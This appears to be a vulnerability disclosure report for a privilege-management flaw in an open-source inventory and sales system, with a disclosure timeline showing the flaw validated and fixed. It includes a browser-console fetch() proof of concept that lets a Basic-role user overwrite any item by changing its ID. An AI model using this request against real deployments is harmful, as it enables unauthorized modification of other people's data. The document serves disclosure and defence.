Improper Privilege Management in amirsanni/mini-inventory-and-sales-management-system


Reported on Jul 31st 2021


Unprivileged user can update an item


1. From the admin account, add a new user called user-B with the basic role.
2. Now log in to the user-B account; user-B cannot see any item.
Now, as user-B, execute the JavaScript code below in the browser console and it will update an item:

// Request as captured from user-B's browser session. The session cookie is
// attached by "credentials": "include", so the server treats the caller as a
// logged-in user; no role check stops a Basic user from reaching the endpoint.
await fetch("", {   // URL of the item-update endpoint (not given in the report)
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    },
    "referrer": "",
    // _iId is the id of the item being overwritten; the other fields are the new values
    "body": "itemName=cellphone&itemPrice=4664&itemDesc=cellphone+demopasskkk+by_users&_iId=824&itemCode=4654",
    "method": "POST",
    "mode": "cors"
});

In this request, change the _iId parameter value to the ID of the item you want to update.


A user with the Basic role can update an item.


We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back a year ago
Amir validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir marked this as fixed with commit ba36f6 a year ago
Amir has been awarded the fix bounty
This vulnerability will not receive a CVE